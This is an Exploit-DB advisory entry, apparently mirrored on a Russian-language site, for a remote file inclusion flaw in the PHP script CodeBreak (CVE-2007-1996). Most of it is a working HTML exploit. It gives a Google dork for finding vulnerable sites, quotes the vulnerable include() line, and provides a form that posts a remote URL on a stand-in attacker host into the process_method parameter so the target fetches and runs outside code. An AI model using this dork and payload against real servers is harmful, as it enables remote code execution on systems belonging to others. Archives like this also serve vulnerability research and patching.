- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 3711
- Проверка EDB
-
- Пройдено
- Автор
- JOHN MARTINELLI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-1996
- Дата публикации
- 2007-04-11
HTML:
<!--
CodeBreak (codebreak.php process_method) - Remote File Inclusion Vulnerability
Google d0rk: intitle:"CodeBreak - Hidden Morse Code"
Vulnerable Code: include($_POST["process_method"] . "_" . $_POST["output_method"] . ".inc");
John Martinelli
[email protected]
http://john-martinelli.com
April 11th, 2007
!-->
<html>
<head><title>CodeBreak (codebreak.php process_method) - Remote File Inclusion Vulnerability</title><body>
<center><br><br><font size=4>CodeBreak (codebreak.php process_method) - Remote File Inclusion Vulnerability</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?q=intitle%3A%22CodeBreak+-+Hidden+Morse+Code">intitle:"CodeBreak - Hidden Morse Code"</a></font><br>
<br><br>
<form action="http://www.target.com/codebreak.php" method="post">
<input name="input_text" size=75 value="input_text" type=hidden>
<input name="process_method" size=75 value="http://bad.site/badcode.txt?">
<input type=submit value="Execute RFI Attack" class="button">
</form>
</body></html>
# milw0rm.com [2007-04-11]
- Источник
- www.exploit-db.com